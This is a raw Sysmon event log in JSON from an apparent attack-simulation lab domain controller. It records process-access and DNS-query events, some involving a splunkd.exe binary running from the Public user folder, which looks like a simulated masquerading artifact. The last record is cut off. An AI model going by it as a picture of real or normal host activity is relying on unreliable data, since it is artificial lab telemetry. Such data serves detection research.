{"EventTime":"2020-08-01 06:52:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4216,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:03.059\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nSourceProcessId: 2928\r\nSourceThreadId: 3388\r\nSourceImage: C:\\Windows\\sysmon64.exe\r\nTargetProcessGUID: {E2A3D6B1-1111-5F25-0000-001045FA0500}\r\nTargetProcessId: 3068\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ntdll.dll+6c08a|C:\\Windows\\System32\\KERNEL32.DLL+1cff8|C:\\Windows\\System32\\KERNEL32.DLL+25a87|C:\\Windows\\sysmon64.exe+15618|C:\\Windows\\sysmon64.exe+16062|C:\\Windows\\sysmon64.exe+16487|C:\\Windows\\sysmon64.exe+1991e|C:\\Windows\\sysmon64.exe+1b8c4|C:\\Windows\\sysmon64.exe+1bb9f|C:\\Windows\\sysmon64.exe+1bcb5|C:\\Windows\\sysmon64.exe+a7d09|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:03.059","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","SourceProcessId":"2928","SourceThreadId":"3388","SourceImage":"C:\\Windows\\sysmon64.exe","TargetProcessGUID":"{E2A3D6B1-1111-5F25-0000-001045FA0500}","TargetProcessId":"3068","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ntdll.dll+6c08a|C:\\Windows\\System32\\KERNEL32.DLL+1cff8|C:\\Windows\\System32\\KERNEL32.DLL+25a87|C:\\Windows\\sysmon64.exe+15618|C:\\Windows\\sysmon64.exe+16062|C:\\Windows\\sysmon64.exe+16487|C:\\Windows\\sysmon64.exe+1991e|C:\\Windows\\sysmon64.exe+1b8c4|C:\\Windows\\sysmon64.exe+1bb9f|C:\\Windows\\sysmon64.exe+1bcb5|C:\\Windows\\sysmon64.exe+a7d09|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4217,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:03.059\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nSourceProcessId: 2928\r\nSourceThreadId: 3388\r\nSourceImage: C:\\Windows\\sysmon64.exe\r\nTargetProcessGUID: {E2A3D6B1-1111-5F25-0000-001045FA0500}\r\nTargetProcessId: 3068\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\sysmon64.exe+2515c|C:\\Windows\\sysmon64.exe+1b75d|C:\\Windows\\sysmon64.exe+1bb9f|C:\\Windows\\sysmon64.exe+1bcb5|C:\\Windows\\sysmon64.exe+a7d09|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:03.059","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","SourceProcessId":"2928","SourceThreadId":"3388","SourceImage":"C:\\Windows\\sysmon64.exe","TargetProcessGUID":"{E2A3D6B1-1111-5F25-0000-001045FA0500}","TargetProcessId":"3068","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\sysmon64.exe+2515c|C:\\Windows\\sysmon64.exe+1b75d|C:\\Windows\\sysmon64.exe+1bb9f|C:\\Windows\\sysmon64.exe+1bcb5|C:\\Windows\\sysmon64.exe+a7d09|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4218,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:03.059\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nSourceProcessId: 2928\r\nSourceThreadId: 3388\r\nSourceImage: C:\\Windows\\sysmon64.exe\r\nTargetProcessGUID: {E2A3D6B1-1111-5F25-0000-001045FA0500}\r\nTargetProcessId: 3068\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ntdll.dll+6c08a|C:\\Windows\\System32\\KERNEL32.DLL+1cff8|C:\\Windows\\System32\\KERNEL32.DLL+25a87|C:\\Windows\\sysmon64.exe+15618|C:\\Windows\\sysmon64.exe+16062|C:\\Windows\\sysmon64.exe+16487|C:\\Windows\\sysmon64.exe+1991e|C:\\Windows\\sysmon64.exe+1b8c4|C:\\Windows\\sysmon64.exe+1bb9f|C:\\Windows\\sysmon64.exe+1bcb5|C:\\Windows\\sysmon64.exe+a7d09|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:03.059","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","SourceProcessId":"2928","SourceThreadId":"3388","SourceImage":"C:\\Windows\\sysmon64.exe","TargetProcessGUID":"{E2A3D6B1-1111-5F25-0000-001045FA0500}","TargetProcessId":"3068","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ntdll.dll+6c08a|C:\\Windows\\System32\\KERNEL32.DLL+1cff8|C:\\Windows\\System32\\KERNEL32.DLL+25a87|C:\\Windows\\sysmon64.exe+15618|C:\\Windows\\sysmon64.exe+16062|C:\\Windows\\sysmon64.exe+16487|C:\\Windows\\sysmon64.exe+1991e|C:\\Windows\\sysmon64.exe+1b8c4|C:\\Windows\\sysmon64.exe+1bb9f|C:\\Windows\\sysmon64.exe+1bcb5|C:\\Windows\\sysmon64.exe+a7d09|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4219,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:03.435\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:03.435","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4220,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:03.591\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nSourceProcessId: 2928\r\nSourceThreadId: 3400\r\nSourceImage: C:\\Windows\\sysmon64.exe\r\nTargetProcessGUID: {E2A3D6B1-1111-5F25-0000-001045FA0500}\r\nTargetProcessId: 3068\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ntdll.dll+6c08a|C:\\Windows\\System32\\KERNEL32.DLL+1cff8|C:\\Windows\\System32\\KERNEL32.DLL+25a87|C:\\Windows\\sysmon64.exe+15618|C:\\Windows\\sysmon64.exe+16062|C:\\Windows\\sysmon64.exe+16487|C:\\Windows\\sysmon64.exe+193a0|C:\\Windows\\sysmon64.exe+5fe0|C:\\Windows\\sysmon64.exe+6177|C:\\Windows\\System32\\sechost.dll+10a75|C:\\Windows\\System32\\sechost.dll+1004d|C:\\Windows\\System32\\sechost.dll+fe55|C:\\Windows\\System32\\sechost.dll+ed3f|C:\\Windows\\sysmon64.exe+6353|C:\\Windows\\sysmon64.exe+a7d09|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:03.591","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","SourceProcessId":"2928","SourceThreadId":"3400","SourceImage":"C:\\Windows\\sysmon64.exe","TargetProcessGUID":"{E2A3D6B1-1111-5F25-0000-001045FA0500}","TargetProcessId":"3068","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ntdll.dll+6c08a|C:\\Windows\\System32\\KERNEL32.DLL+1cff8|C:\\Windows\\System32\\KERNEL32.DLL+25a87|C:\\Windows\\sysmon64.exe+15618|C:\\Windows\\sysmon64.exe+16062|C:\\Windows\\sysmon64.exe+16487|C:\\Windows\\sysmon64.exe+193a0|C:\\Windows\\sysmon64.exe+5fe0|C:\\Windows\\sysmon64.exe+6177|C:\\Windows\\System32\\sechost.dll+10a75|C:\\Windows\\System32\\sechost.dll+1004d|C:\\Windows\\System32\\sechost.dll+fe55|C:\\Windows\\System32\\sechost.dll+ed3f|C:\\Windows\\sysmon64.exe+6353|C:\\Windows\\sysmon64.exe+a7d09|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":4221,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:00.975\r\nProcessGuid: {E2A3D6B1-1111-5F25-0000-001045FA0500}\r\nProcessId: 3068\r\nQueryName: win-dc-8400769.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:52:00.975","ProcessGuid":"{E2A3D6B1-1111-5F25-0000-001045FA0500}","QueryName":"win-dc-8400769.attackrange.local","QueryStatus":"0","QueryResults":"fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","EventReceivedTime":"2020-08-01 06:52:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4222,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:03.591\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nSourceProcessId: 2928\r\nSourceThreadId: 3400\r\nSourceImage: C:\\Windows\\sysmon64.exe\r\nTargetProcessGUID: {E2A3D6B1-1111-5F25-0000-001045FA0500}\r\nTargetProcessId: 3068\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ntdll.dll+6c08a|C:\\Windows\\System32\\KERNEL32.DLL+1cff8|C:\\Windows\\System32\\KERNEL32.DLL+25a87|C:\\Windows\\sysmon64.exe+15618|C:\\Windows\\sysmon64.exe+16062|C:\\Windows\\sysmon64.exe+16487|C:\\Windows\\sysmon64.exe+193a0|C:\\Windows\\sysmon64.exe+5fe0|C:\\Windows\\sysmon64.exe+6177|C:\\Windows\\System32\\sechost.dll+10a75|C:\\Windows\\System32\\sechost.dll+1004d|C:\\Windows\\System32\\sechost.dll+fe55|C:\\Windows\\System32\\sechost.dll+ed3f|C:\\Windows\\sysmon64.exe+6353|C:\\Windows\\sysmon64.exe+a7d09|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:03.591","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","SourceProcessId":"2928","SourceThreadId":"3400","SourceImage":"C:\\Windows\\sysmon64.exe","TargetProcessGUID":"{E2A3D6B1-1111-5F25-0000-001045FA0500}","TargetProcessId":"3068","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ntdll.dll+6c08a|C:\\Windows\\System32\\KERNEL32.DLL+1cff8|C:\\Windows\\System32\\KERNEL32.DLL+25a87|C:\\Windows\\sysmon64.exe+15618|C:\\Windows\\sysmon64.exe+16062|C:\\Windows\\sysmon64.exe+16487|C:\\Windows\\sysmon64.exe+193a0|C:\\Windows\\sysmon64.exe+5fe0|C:\\Windows\\sysmon64.exe+6177|C:\\Windows\\System32\\sechost.dll+10a75|C:\\Windows\\System32\\sechost.dll+1004d|C:\\Windows\\System32\\sechost.dll+fe55|C:\\Windows\\System32\\sechost.dll+ed3f|C:\\Windows\\sysmon64.exe+6353|C:\\Windows\\sysmon64.exe+a7d09|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":4223,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:00.982\r\nProcessGuid: {E2A3D6B1-1111-5F25-0000-001045FA0500}\r\nProcessId: 3068\r\nQueryName: win-dc-8400769.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:52:00.982","ProcessGuid":"{E2A3D6B1-1111-5F25-0000-001045FA0500}","QueryName":"win-dc-8400769.attackrange.local","QueryStatus":"0","QueryResults":"fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","EventReceivedTime":"2020-08-01 06:52:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4224,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:04.436\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:04.436","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4225,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:05.437\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 